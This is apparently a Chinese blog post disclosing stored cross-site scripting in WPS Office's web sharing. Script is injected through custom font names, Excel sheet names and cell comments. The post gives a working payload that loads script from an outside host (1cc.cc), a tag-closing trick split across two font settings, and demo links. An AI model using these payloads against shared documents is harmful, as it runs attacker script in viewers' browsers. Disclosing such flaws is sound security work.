关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)

我前几天看到wps嵌入一个在web的线模板(之前没接触过wps),我第一反应就是这不安全,果断有漏洞可寻。

今天下载了wps测试。

1、office---所有字体名称导致xss

模板没有,超链接亦没有,我就看看字体,发现,可以自定义字体。拿">'><iframe>试,真的有漏洞。

在插入脚本时

"><script/src=//1cc.cc/l3>
发现执行不了,换了浏览器亦不行。但脚本已经插入到页面,考虑到是标签闭合的原因,于是就设置了两组

如图
<ignore_js_op> 
在汉字里设置字体为

  1. "><script/src=//1cc.cc/l3>

复制代码

<ignore_js_op> 
在英文里设置字体为

  1. </script>

复制代码

这样就闭合了,然后分享保存到云端,经测试成功。
<ignore_js_op> 
演示:http://qing.wps.cn/p/9506637

2、excel

①如果sheet名为代码,web浏览时会执行。

<ignore_js_op> 
<ignore_js_op> 
②如果单元格的标注为代码,web浏览时会执行

<ignore_js_op> 

<ignore_js_op> 
演示:http://qing.wps.cn/l/11dfd221c7d64f1c980b8be152b9b8fa

3、ppt 所有字体导致xss

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码